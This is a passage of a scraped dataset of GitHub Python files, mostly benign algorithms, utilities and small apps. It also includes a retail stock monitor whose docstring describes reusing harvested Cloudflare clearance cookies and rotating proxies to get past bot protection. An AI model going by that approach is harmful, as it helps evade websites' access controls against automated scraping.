'\\n')\ncurr = 0\nwhile(curr<ans):\n    res = []\n    for i in pathExist:\n        if(streetIntersections[i][1] == done[curr]):\n            res.append(i)\n    fout.write(str(done[curr])+'\\n')\n    fout.write(str(len(res))+'\\n')\n    rm = randint(1,2)\n    maxi = 0\n    resm = \"\"\n    for i in res:\n        if(streetCount[i]>maxi):\n            maxi = streetCount[i]\n            resm = i\n    for i in res:\n        if(i == resm):\n            fout.write(i+\" \"+str(rm)+'\\n')\n        else:\n            fout.write(i+\" \"+str(1)+'\\n')\n    curr+=1\n\nfin.close()\nfout.close()","repo_name":"MrChepe09/Competitive-Programming-Codes","sub_path":"Google Hashcode 2021/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"83"}
+{"seq_id":"6362126580","text":"# coding=utf-8\n# uliontse\n\n'''\nPut mutually aggressive animals into separate cages, using as few cages as possible.\n'''\n\nfrom collections import deque,Iterable\nfrom pprint import pprint as ppt\n\ndef initM():\n    attackGroup = {\n        (0,5),(1,0),(1,4),(1,5),(1,7),(1,8),\n        (3,4),(4,8),(5,2),(5,6),(6,2),(6,4),(8,3)\n    }\n    # Assume every animal attacks or is attacked by some other animal; all such pairs are in attackGroup.\n    # Now determine the number of animals:\n    def oneDim(L):\n        for each in L:\n            if not isinstance(each, Iterable):\n                yield each\n            else:\n                yield from oneDim(each)\n    N = len(set(oneDim(attackGroup)))\n    M = [[0] * N for _ in range(N)]\n    for i,j in attackGroup:\n        M[i][j] = M[j][i] = 1\n    return M\n\n\ndef division(M,n=None):\n    if not n: n = len(M) # if some animals attack nothing, the animal count is usually given\n    res = []\n    q = deque(range(n))\n    pre = n\n\n    while q:\n        cur = q.popleft()\n        if pre >= cur:\n            res.append([])\n\n        for i in res[-1]:\n            if M[cur][i] == 1:\n                q.append(cur)\n                break\n        else:\n            res[-1].append(cur)\n        pre = cur\n    return res\n\n\nif __name__ == '__main__':\n    M = 
initM()\n    ppt(M)\n    print(division(M))\n","repo_name":"0xr0ot/PY_self","sub_path":"algorithm/DataStructure/queue/queue_division.py","file_name":"queue_division.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"83"}
+{"seq_id":"27591966958","text":"\"\"\"\nProject 1: Alphabetizer\nSpencer Cassetta\ncassett8 - A54379022\nCSE 260 - James Daly\n\"\"\"\nclass Person:\n    \"\"\"\n    Class : Person\n    has a first name, last name, and email.\n    built in functionality for <,>,= operators\n    \"\"\"\n    def __init__(self, first, last, email):\n        self.first = first\n        self.last = last\n        self.email = email\n    def __str__(self):\n        return '{0} {1} <{2}>'.format(self.first, self.last, self.email)\n    def __repr__(self):\n        return '({0}, {1}, {2})'.format(self.first, self.last, self.email)\n    def __eq__(self, other):\n        return self.first == other.first and self.last == other.last and self.email == other.email\n\ndef order_first_name(a, b):\n    \"\"\"\n    Orders two people by their first names\n    :param a: a Person\n    :param b: a Person\n    :return: True if a comes before b alphabetically and False otherwise\n    \"\"\"\n    # if a comes before b, then true\n    if a.first < b.first:\n        return True\n    # if equal, compare with last name\n    if a.first == b.first:\n        return a.last < b.last\n    # a does not come before b\n    return False\ndef order_last_name(a, b):\n    \"\"\"\n    Orders two people by their last names\n    :param a: a Person\n    :param b: a Person\n    :return: True if a comes before b alphabetically and False otherwise\n    \"\"\"\n    if a.last < b.last:\n        return True\n    # if equal, compare with first name\n    if a.last == b.last:\n        return a.first < b.first\n    # a does not come before b\n    return False\n\ndef is_alphabetized(roster, ordering):\n    \"\"\"\n    Checks whether the roster of names is alphabetized in the given order\n    :param roster: a list of people\n    :param ordering: a function comparing two elements\n    :return: True if the roster is alphabetized and False otherwise\n    \"\"\"\n    # loop through roster\n    for i in range(len(roster)-1):\n        #if elements are equal, then continue\n        if roster[i] == roster[i+1]:\n            continue\n        # if not in correct order,\n        elif not ordering(roster[i], roster[i+1]):\n            # then it is not sorted\n            return False\n    #made it all the way through list,\n    # must be sorted\n    return True\ndef merge(l, r, ordering):\n    \"\"\"\n    takes 2 lists and merges them into new list in sorted order\n    :param l: a list of elements\n    :param r: a list of elements\n    :param ordering: a function comparing two elements\n    :return: a sorted list containing both elements of r and l\n    :return: the number of comparisons made\n    inspired by pseudocode\n    \"\"\"\n    #declare variables, max length of lists,\n    # and new list to store elements\n    i, j, comp = 0, 0, 0\n    n, m = len(l), len(r)\n    new = []\n    #loop through the lists as long as inbound\n    while i < n and j < m:\n        #else-if determines which element\n        # is smaller and puts it in the new list first\n        if ordering(l[i], r[j]):\n            new.append(l[i])\n            i += 1\n        else:\n            new.append(r[j])\n            j += 1\n        # a comparison was made\n        comp += 1\n    #finds the list that didn't get iterated all the way\n    # through and appends the rest of it to the new list\n    while j < len(r):\n        new.append(r[j])\n        j += 1\n    while i < len(l):\n        new.append(l[i])\n        i += 1\n    #return new list along with\n    #number of comparisons made\n    return (new, comp)\n\n\ndef mergesort(arr, ordering):\n    \"\"\"\n    uses recursion to break array into smallest components\n    and merge all of them in sorted order using the 
merge function\n    :param arr: a list of elements\n    :param ordering: a function comparing two elements\n    :return: a sorted version of roster\n    :return: the number of comparisons made\n    inspired by pseudocode given in lecture\n    \"\"\"\n    # if only 1 element,\n    # then we are done breaking apart\n    if len(arr) < 2:\n        return (arr, 0)\n    #breaks down list into smaller components\n    #by breaking it into halves at a time\n    #stores halves into l and r\n    #stores comparisons made in comp1 and comp2\n    l, comp1 = mergesort(arr[(len(arr) // 2):], ordering)\n    r, comp2 = mergesort(arr[:(len(arr) // 2)], ordering)\n    #sorts and merges all together using merge\n    #stores new list in result\n    #stores comparisons made by merge in comp\n    result, comp = merge(l, r, ordering)\n    #adds all comparisons together\n    comp = comp + comp1 + comp2\n    #returns the sorted list along with comparisons made\n    return (result, comp)\ndef alphabetize(roster, ordering):\n    \"\"\"\n    Alphabetizes the roster according to the given ordering\n    :param roster: a list of people\n    :param ordering: a function comparing two elements\n    :return: a sorted version of roster\n    :return: the number of comparisons made\n    \"\"\"\n    # check if already sorted\n    if is_alphabetized(roster, ordering):\n        #if so, return right away\n        return (list(roster), 0)\n    # if not then do a mergesort,\n    roster, comp = mergesort(roster, ordering)\n    # return sorted list and # of comparisons\n    return (list(roster), comp)\n","repo_name":"SpudMSU/Classwork","sub_path":"CSE331/Alphabatizer.py","file_name":"Alphabatizer.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"15653314031","text":"import re\n\ndef add(numberstring):\n\n    \"\"\" This function inputs a sequence of numbers written \n    in a string format. It then returns the sum of all the numbers\n    within the sequence. It does not include numbers \n    that are greater than or equal to 1000. It throws an exception for any sequence\n    that contains a negative number. 
The string calculator \n    handles strings of the following format:\n    1) returns an empty string as the number 0.\n    2) multiple delimiters in the form \"//[delimeter]\\n...\" or \"//[&][^]...\\n...\"\n    3) sequences with new line characters \"\"\"\n\n    extracted_string = extracting_numbers_from_the_string(numberstring)\n    sum_of_string_numbers = addition_of_extracted_strings(extracted_string)\n    \n    return sum_of_string_numbers\n\ndef extracting_numbers_from_the_string(numberstring):\n    if numberstring == \"\": #empty strings return a zero\n        extracted_string = '0'\n    \n    elif re.search(r\"(\\[.\\])\", numberstring): #matches '//[&][*][$]\\n...&' \n        extracted_string = re.findall(r\"\\d+\", numberstring)\n    \n    elif re.match(r\"(\\/\\/.+\\n)\", numberstring): #matches \"//[delimeter]\\n245;145;245;2000\" \n        delimeter_string = re.findall(r\"((?<=\\/\\/).*?(?=\\n))\", numberstring)\n        y = delimeter_string[0] #convert delimeter_string into a string that can be handled by the extracted_string regex\n        extracted_string = re.findall(r\"((?<=\\n)[-+]?\\d+(?=%s)|(?<=%s)[-+]?\\d+(?=%s)|(?<=%s)[-+]?\\d+)\" %(y,y,y,y), numberstring) #this regular expression also uses\n    \n    elif re.match(r\"(^(\\d+|-\\d+))\", numberstring): #matches '-52, 1\\n5, 1, 1'\n        extracted_string = re.findall(r\"(-\\d+|\\d+)\", numberstring)\n    \n    return extracted_string\n    \ndef addition_of_extracted_strings(extracted_string): #handles string of numbers extracted from different formats\n    negativenumbers = re.findall(r\"-\\d+\", str(extracted_string))\n    sum_of_string_numbers = 0\n    for number in extracted_string:\n    \n        if int(number) < 0: #no negative numbers allowed\n            raise Exception(\"Negatives: \" + str(negativenumbers) + \" Not Allowed\" )\n    \n        elif int(number) < 1000: #numbers larger than 1000 ignored\n            sum_of_string_numbers = sum_of_string_numbers + int(number)\n    \n    return sum_of_string_numbers\n\nif __name__ == \"__main__\":\n    \n    numberstring = '//[&][*][$]\\n1*56$1&'\n    print(add(numberstring)) \n","repo_name":"HlobisileMlebuka/StringCalculator","sub_path":"strcalculator.py","file_name":"strcalculator.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"32593728827","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 25 08:00:53 2022\n\n@author: tandeitnik\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nsteps = 2\n\nseed_x = [0,0,1]\nseed_y = [0,1,1]\n\n#plt.plot(seed_x,seed_y)\n\nfor step in range(steps):\n\n    seed_x_temp = [0]\n    seed_y_temp = [0]\n    \n    sign = 1\n    \n    for i in range(len(seed_x)-1):\n        \n        \n        x_0 = [seed_x[i],seed_x[i+1]]\n        y_0 = [seed_y[i],seed_y[i+1]]\n\n        scale = np.cos(45*np.pi/180)\n\n        \n        x_1 = [x_0[0],x_0[0]+scale*((x_0[1]-x_0[0])*np.cos(sign*45*np.pi/180) -(y_0[1]-y_0[0])*np.sin(sign*45*np.pi/180))]\n        y_1 = [y_0[0],y_0[0]+scale*((x_0[1]-x_0[0])*np.sin(sign*45*np.pi/180) +(y_0[1]-y_0[0])*np.cos(sign*45*np.pi/180))]\n        \n\n        \n        seed_x_temp.append(x_1[1])\n        seed_y_temp.append(y_1[1])\n        \n        sign = sign*(-1)\n        \n\n        \n        seed_x_temp.append(seed_x[i+1])\n        seed_y_temp.append(seed_y[i+1])\n        \n\n        \n    seed_x = seed_x_temp\n    seed_y = seed_y_temp\n    \nplt.plot(seed_x,seed_y)\nplt.axis('off')\nplt.gca().set_aspect('equal', 
adjustable='box')\nplt.tight_layout()\n","repo_name":"tandeitnik/Beautiful-math","sub_path":"dragon_curve.py","file_name":"dragon_curve.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
+{"seq_id":"11157586808","text":"def is_prime(N):\r\n    N += 1\r\n    A = [True] * N\r\n    A[0] = A[1] = False\r\n    for k in range(2, int(N**0.5) + 1):  # sieve up to sqrt(N) inclusive\r\n        if A[k]:\r\n            for m in range(2*k, N, k):\r\n                A[m] = False\r\n    return [k for k in range(N) if A[k]]\r\n\r\n\r\nwhile True:\r\n    try:\r\n        N = int(input(\"Enter an integer N: \"))\r\n        print(\"Primes from 2 to N:\", *is_prime(N))\r\n        exit(0)\r\n    except (TypeError, ValueError) as e:\r\n        print(\"Something went wrong, enter the number again!\", e)","repo_name":"ArstanbekovTamerlan/Lecture03","sub_path":"zadanie 1.py","file_name":"zadanie 1.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"22651561459","text":"\"\"\"\nUse playwright chrome browser to gen cloudflare cookies.\nPass it to httpx and go crazy.\n\nSKU can be grabbed from link.\n    On the ATC btn.\n    Base 64 encoded sku.\n\nProxy apparently does not need to stay the same as cookie.\n\nGrab CF cookies from browser, or use manually obtained cookies.\nGo to urls in file\nwebhook if item is found\n\"\"\"\nimport asyncio\nimport functools\nfrom asyncio import sleep\nfrom random import randint, choice\nfrom time import time\nfrom typing import Union\n\nimport aiohttp\nimport ray as ray\nfrom bs4 import BeautifulSoup\n\nimport httpx\nfrom ray.thirdparty_files import psutil\n\nfrom utils.base import Base\nfrom utils.global_vars import GLOBAL\nfrom utils.tools import print_req_info, update_title, auth, send_req\nfrom utils.webhook import send_webhook\n\n\nREQ_COUNTER = set()\nREQ_COUNTER_SEM = asyncio.Semaphore(1)\nCURRENT_PROXIES = []\nSENT_WEBHOOKS = {}\n\n\nasync def update_timer():\n    # add to req_counter. 
update title\n REQ_COUNTER.add(time())\n for _time in REQ_COUNTER.copy():\n if time() - _time > 1:\n REQ_COUNTER.discard(_time)\n update_title(f'Checks in Last (1) Second: [{len(REQ_COUNTER)}]')\n return\n\n\ndef is_available(res: httpx.Response):\n if res.text.find('\"availability\": \"http://schema.org/InStock\"') != -1:\n return True\n\n\nclass FTLAEMonitor(Base):\n def __init__(self, link, webhook_client, webhook_sem):\n super().__init__()\n self.counter.tasks += 1\n self.task_num = self.counter.tasks\n\n self.link: str = link\n self.webhook_client = webhook_client\n self.webhook_sem = webhook_sem\n self.headers: dict = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0'\n }\n\n self.price, self.product_name, self.image_link, self.resp, self.sku = (None for _ in range(5))\n self.client: Union[httpx.AsyncClient, None] = None\n self.cf_cookie: Union[str, None] = None\n\n async def create_client(self):\n if not self.client:\n self.client = httpx.AsyncClient(proxies=choice(GLOBAL.isps))\n # self.client.cookies.set(name='cf_clearance', value='dzLUHkun0DVyOijQXA1q8bvWHtQ5714lEr4CDPofgzc')\n\n async def close_client(self):\n if self.client:\n await self.client.aclose()\n self.client = None\n\n async def set_product(self):\n src = BeautifulSoup(self.resp.text, 'lxml')\n src = src.select('script[type=\"application/ld+json\"]')\n src = eval(src[1].string)\n self.product_name = src['name']\n self.image_link = src['image']\n self.sku = src['sku']\n self.price = f\"{src['offers']['price']} {src['offers']['priceCurrency']}\"\n\n async def check_page(self):\n req = httpx.Request(\n method='GET',\n url=self.link,\n headers=self.headers,\n cookies=self.client.cookies\n )\n self.resp = await send_req(functools.partial(self.client.send, req))\n if not self.resp:\n self.warn('No Resp')\n return\n\n results = await asyncio.gather(*(self.is_available(), update_timer()))\n\n self.debug(f'Checked - {self.resp.status_code}')\n\n if any(results):\n return True\n\n async def is_available(self):\n if not is_available(self.resp):\n # if not available and was previously pushed.\n async with self.webhook_sem:\n if SENT_WEBHOOKS.get(self.sku, None):\n self.debug('Product has been pulled!')\n await self.send_webhooks('PULLED')\n SENT_WEBHOOKS.pop(self.sku)\n return True\n return\n\n await self.set_product()\n\n async with self.webhook_sem:\n if not SENT_WEBHOOKS.get(self.sku, None):\n self.debug('New Webhook! Sending Now!')\n await self.send_webhooks('NO_REPEAT')\n SENT_WEBHOOKS[self.sku] = time()\n\n if SENT_WEBHOOKS.get(self.sku, None):\n if time() - SENT_WEBHOOKS[self.sku] < GLOBAL.reminder_timeout:\n self.debug('Already Sent Webhook Within Timeout Period')\n return\n if time() - SENT_WEBHOOKS[self.sku] > GLOBAL.reminder_timeout:\n self.debug('Already Sent Webhook. 
But Timeout period has been exceeded.')\n await self.send_webhooks('REPEAT')\n SENT_WEBHOOKS[self.sku] = time()\n return\n\n async def send_webhooks(self, message):\n await asyncio.gather(*(send_webhook(caller=self,\n url=link,\n message=message)\n for link in GLOBAL.webhooks))\n\n async def run(self):\n await self.create_client()\n while True:\n if not await self.check_page():\n continue\n await self.is_available()\n break\n await self.close_client()\n\n\n# @todo - need to make sure only one of these run at a time\n\nasync def check_auth():\n # print('Inside _check_auth()')\n while True:\n auth()\n await sleep(60)\n\n\n# @ray.remote(num_cpus=1)\n# def check_auth():\n# print('Inside check_auth()')\n# asyncio.run(_check_auth())\n\n\n# num_cpus = psutil.cpu_count(logical=True)\n\n\n# @ray.remote(num_cpus=num_cpus)\n# class AsyncActor:\nasync def run():\n print('Inside AsyncActor')\n webhook_client = aiohttp.ClientSession()\n webhook_sem = asyncio.Semaphore(1)\n tasks = [\n FTLAEMonitor(\n link,\n webhook_client=webhook_client,\n webhook_sem=webhook_sem\n ).run()\n for link in GLOBAL.links\n ]\n try:\n await asyncio.gather(*tasks, check_auth())\n finally:\n await webhook_client.close()\n\n\nif __name__ == \"__main__\":\n asyncio.run(run())\n","repo_name":"lafftar/FTLAEMonitor","sub_path":"utils/sku_monitor.py","file_name":"sku_monitor.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20890835330","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n__author__ = '赖富玉'\n\nimport os\nimport pdfkit\nimport logging\n\nfrom django.conf import settings\n\nlogger = logging.getLogger('mylogger')\n\n# 批量创建目录\ndef mkdirs_in_batch(path):\n try:\n path = os.path.normpath(path) # 去掉路径最右侧的 \\\\ 、/\n path = path.replace('\\\\', '/') # 将所有的\\\\转为/,避免出现转义字符串\n head, tail = os.path.split(path)\n if not os.path.isdir(path) and os.path.isfile(path): # 如果path指向的是文件,则分解文件所在目录\n head, tail = os.path.split(head)\n\n if tail == '': # head为根目录,形如 / 、D:\n return True\n\n new_dir_path = '' # 存放反转后的目录路径\n root = '' # 存放根目录\n while tail:\n new_dir_path = new_dir_path + tail + '/'\n head, tail = os.path.split(head)\n root = head\n else:\n new_dir_path = root + new_dir_path\n\n # 批量创建目录\n new_dir_path = os.path.normpath(new_dir_path)\n head, tail = os.path.split(new_dir_path)\n temp = ''\n while tail:\n temp = temp + '/' + tail\n dir_path = root + temp\n if not os.path.isdir(dir_path):\n os.mkdir(dir_path)\n head, tail = os.path.split(head)\n return True\n except Exception as e:\n logger.error('批量创建目录出错:%s' % e)\n return False\n\n\ndef string_hump_to_underline(src_string):\n '''\n 字符串 驼峰式转下划线分割式\n 例子:MyExamp -> my_examp\n '''\n\n for char in src_string[0:]:\n if ord(char) != ord(char.lower()): # 大写字母\n src_string = src_string.replace(char, '_' + char.lower())\n\n src_string = src_string.lstrip('_')\n return src_string\n\n\ndef html_str_to_pdf_file(html_str, file_name):\n '''由html字符串生成pdf'''\n\n try:\n config = pdfkit.configuration(wkhtmltopdf=settings.WKHTMLTOPDF)\n file_dir = settings.MEDIA_ROOT.rstrip('/') + '/sprint/testreport'\n if not os.path.exists(file_dir):# 路径不存在\n if not mkdirs_in_batch(file_dir):\n return [False,'生成报告失败:批量创建路径(%s)对应的目录失败' % file_dir]\n\n options = {'dpi': 300, 'image-dpi':600, 'page-size':'A3', 'encoding':'UTF-8', 'page-width':'1903px'}\n pdfkit.from_string(html_str, '%s/%s' % (file_dir, file_name), configuration=config, options=options)\n file_absolute_path = '%s/%s' % (file_dir, 
file_name)\n return [True, file_absolute_path]\n except Exception as e:\n msg = '生成迭代测试报告出错:%s' % e\n logger.error(msg)\n return [False, msg]\n","repo_name":"themycode/test-management-platform","sub_path":"backend/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6617240726","text":"def common_words(first, second):\n f = set(first.split(\",\"))\n s = set(second.split(\",\"))\n\n i = list(sorted(f.intersection(s)))\n\n return \",\".join(i)\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert common_words(\"hello,world\", \"hello,earth\") == \"hello\", \"Hello\"\n assert common_words(\"one,two,three\", \"four,five,six\") == \"\", \"Too different\"\n assert common_words(\"one,two,three\", \"four,five,one,two,six,three\") == \"one,three,two\", \"1 2 3\"\n print(\"Coding complete? Click 'Check' to review your tests and earn cool rewards!\")\n","repo_name":"charlysparks/checkio","sub_path":"Empire of Code/common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24627872097","text":"import random\n\ninfinity = float(\"inf\")\n\nknockdown_command_action = {\"name\": \"Knockdown\", \"uninterruptible\": True,\n \"next action\": {\"name\": \"Standup\", \"uninterruptible\": True}}\nheavy_damaged_command_action = {\"name\": \"HeavyDamaged\", \"uninterruptible\": True}\ndamaged_command_action = {\"name\": \"Damaged\", \"uninterruptible\": True}\n\n\ndef cal_loss(self, target, final_dmg, final_morale_dmg, leader_dmg, element_effect):\n \"\"\"\n :param self: Attacker Subunit object\n :param target: Damage receiver Subunit object\n :param final_dmg: Damage value to health\n :param final_morale_dmg: Damage value to morale\n :param leader_dmg: Damage value to leader inside target subunit\n :param element_effect: Dict of element effect inflict to target\n \"\"\"\n if final_dmg > target.subunit_health: # dmg cannot be higher than remaining health\n final_dmg = target.subunit_health\n\n if final_dmg > target.max_health10:\n target.interrupt_animation = True\n target.command_action = knockdown_command_action\n\n target.one_activity_limit = target.max_health / final_dmg * 10\n\n elif final_dmg > target.max_health5:\n target.interrupt_animation = True\n target.command_action = heavy_damaged_command_action\n\n elif final_dmg > target.max_health1: # play damaged animation\n target.interrupt_animation = True\n target.command_action = damaged_command_action\n\n target.subunit_health -= final_dmg\n health_check = 0.1\n if target.max_health != infinity:\n health_check = 1 - (target.subunit_health / target.max_health)\n target.base_morale -= (final_morale_dmg + self.morale_dmg_bonus) * target.mental * health_check\n target.stamina -= self.stamina_dmg_bonus\n\n if target.red_border is False: # add red colour to indicate taking damage\n target.block_image.fill((200, 50, 50))\n target.red_border = True\n\n for key, value in element_effect.items():\n target.element_status_check[key] += round(final_dmg * value * (100 - target.element_resistance[key] / 100))\n\n # self.base_morale += round((final_morale_dmg / 5)) # recover some morale when deal morale dmg to enemy\n\n if target.leader is not None and target.leader.health > 0 and random.randint(0,\n 10) > 9: # dmg on subunit 
leader, only 10% chance\n        final_leader_dmg = round(leader_dmg - (leader_dmg * target.leader.combat / 101))\n        if final_leader_dmg > target.leader.health:\n            final_leader_dmg = target.leader.health\n        target.leader.health -= final_leader_dmg\n","repo_name":"robgamerz19/Masendor","sub_path":"gamescript/common/subunit/cal_loss.py","file_name":"cal_loss.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"27197537717","text":"import requests\n\nURL = 'http://localhost:3000/articles'\nSAMPLE_DOCUMENTS = [\n    {\n        \"_id\": \"645e1d7e4a17aac61d9e881f\",\n        \"title\": \"REST\",\n        \"content\": \"REST is short for Representational State Transfer. It's an architectural style for designing APIs\"\n    },\n    {\n        \"_id\": \"5c1398aad79ac8eac11e7561\",\n        \"title\": \"Bootstrap\",\n        \"content\": \"This is a framework developed by Twitter that contains pre-made front-end templates for web design\"\n    },\n    {\n        \"_id\": \"5c1398ecd79ac8eac11e7567\",\n        \"title\": \"DOM\",\n        \"content\": \"The Document Object Model is like an API for interacting with our HTML\"\n    },\n    {\n        \"_id\": \"645e2ebf7f6b693014fd5967\",\n        \"title\": \"example title\",\n        \"content\": \"example content\",\n        \"__v\": 0\n    }\n]\n\nupdateContent: str = \"\"\"Chuck Norris delights in having BLT sandwiches for lunch! \nBut understandably his BLT's are made of barracuda, Leaches & Tarantulas on buttered Texas Toast.\"\"\"\n\n\ndef postSampleArticles():\n    responses: list = [requests.post(URL, data={\n        \"title\": document[\"title\"], \"content\": document[\"content\"]}) for document in SAMPLE_DOCUMENTS]\n    return responses\n\n\ndef postOneSampleArticle():\n    payload = {'title': 'example title', 'content': 'example content'}\n    response: requests.Response = requests.post(URL, data=payload)\n    return response\n\n\ndef deleteAllArticlesFromCollection():\n    response = requests.delete(URL)\n    return response\n\n\ndef putUpdateArticle():\n    payload = {'title': 'REST', \"content\": \"xxxxxxxxxxxxxxxx\"}\n    response = requests.put(URL+\"/REST\", data=payload)\n    return response, response.text\n\n\ndef patchUpdateArticle(targetArticleTitle: str = \"TEST\", newTitle: str = None, newContent: str = None):\n    if newTitle:\n        payload = {'title': newTitle}\n    elif newContent:\n        payload = {'content': newContent}\n    else:\n        payload = {}  # nothing to update; send an empty patch rather than referencing an unbound variable\n    response = requests.patch(URL+\"/\"+targetArticleTitle, data=payload)\n    return response, response.text\n\n\ndef deleteArticle(targetArticleTitle: str = \"TEST\"):\n    payload = {'title': targetArticleTitle}\n    response = requests.delete(URL+\"/\"+targetArticleTitle, data=payload)\n    return response, response.text\n","repo_name":"caiolauro/wikiAPI","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17855894014","text":"n=int(input())\nresult=[]\nfor i in range(n):\n    t=int(input())\n    nl=list(map(int,input().split()))\n    i=0\n    j=1\n    ans=[]\n    while j < t:\n        if abs(nl[j] - nl[i]) > 1:\n            ans.append(\"NO\")\n        else:\n            ans.append(\"YES\")\n        i += 1\n        j += 1\n    if \"NO\" in ans:\n        result.append(\"NO\")\n    else:\n        result.append(\"YES\")\nfor i in result:\n    print(i)\n","repo_name":"Habelaz/a2sv","sub_path":"remove_smallest.py","file_name":"remove_smallest.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73016142350","text":"from pprint import pprint\n\nimport 
db\n\nTABLE_NAME = 'market_announcement'\nKEY_NAME = 'COID'\nKEY_VALUE = 'TPEX'\n\n\nif __name__ == '__main__':\n    print(f\"{TABLE_NAME} from {KEY_VALUE}\")\n    for item in db.query_items_by_pkey(TABLE_NAME, KEY_NAME, KEY_VALUE):\n        pprint(item)\n","repo_name":"martinliou/data_analysis","sub_path":"TPEXAnnouncement/query_pk.py","file_name":"query_pk.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37089595771","text":"import cv2\nimport os\nimport numpy as np\nimport computer_vision.src.image_proc as func\n\n\ndef pipeline(path_imgs, path_save, segmentation=1):\n    \"\"\"\n    Pipeline do projeto\n    Arguments:\n        path_imgs: str -- caminho para a pasta das imagens\n        path_save: str -- caminho para salvar os resultados\n        segmentation: int -- 1: Limiar de Otsu\n                             2: Sobel\n                             3: Canny\n\n    Return:\n    \"\"\"\n\n    files_ = os.listdir(path_imgs)\n    #width = 960\n    #height = 1280\n    scale_percent = 30 # percent of original size\n    width = int(960 * scale_percent / 100)\n    height = int(1280 * scale_percent / 100)\n\n    dim = (width, height)\n\n    area = []\n    lar_max = []\n    comp_max = []\n    largura = []\n    comprimento = []\n    name = []\n\n    for f in files_:\n        name.append(f)\n        print(f'[INFO] name: {f}')\n        img = cv2.imread(path_imgs + f)\n        resized = cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n        gray = cv2.cvtColor(resized, cv2.COLOR_RGB2GRAY)\n\n        if segmentation == 1:\n            seg = func.open_otsu(gray)\n\n        elif segmentation == 2:\n            seg = func.subtract_sobel(gray)\n\n        elif segmentation == 3:\n            seg = func.subtract_canny(gray)\n\n        func.plot_and_save(resized, seg, path_save, f.split('.')[0])\n\n        l = func.largura_folha(seg)\n        c = func.comprimento_folha(seg)\n        area.append(func.area_folha(seg))\n        largura.append(l)\n        comprimento.append(c)\n\n        lar_max.append(np.argmax(l))\n        comp_max.append(np.argmax(c))\n\n    func.dataframe_csv(name, area, lar_max, comp_max, 'data_valueMax.csv')\n    func.dataframe_csv(name, area, largura, comprimento, 'dataframe_final.csv')\n\n\ndef main():\n    path = 'images/'\n    path_save = 'data/'\n    pipeline(path, path_save)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"andrerodrig/cognitive-computing-projects","sub_path":"computer_vision/release/ap1.py","file_name":"ap1.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"70412499791","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport time\n\nimport tornado\nimport tornado.gen\n\nfrom api.apiWebSocket import ApiDeviceSocketHandler\nfrom handlers.base import BaseHandler\nfrom handlers.basefunction import BaseFunctionHandler\nfrom models.models import MyTask, MyTaskContent\n\n\n# 任务列表\nclass MyTaskHandler(BaseHandler):\n    @tornado.web.authenticated\n    def get(self):\n        my_tasks = self.session.query(MyTask).filter(MyTask.company_id == self.get_secure_cookie('company_id')).order_by(MyTask.id.desc()).all()\n        self.render(\"task_list.html\", auth_user=self.current_user, my_tasks=my_tasks)\n\n\n# 任务详细\nclass MyTaskDetailHandler(BaseHandler):\n    @tornado.web.authenticated\n    def get(self):\n        my_task_id = self.get_argument(\"my_task_id\")\n        my_task = self.session.query(MyTask).filter(MyTask.id == my_task_id).first()\n        my_task_contents = my_task.my_task_content\n        self.render(\"task_detail.html\", auth_user=self.current_user, my_task_contents=my_task_contents)\n\n\n# 任务列表--删除\nclass MyTaskDeleteHandler(BaseHandler):\n    @tornado.web.authenticated\n    def get(self):\n        
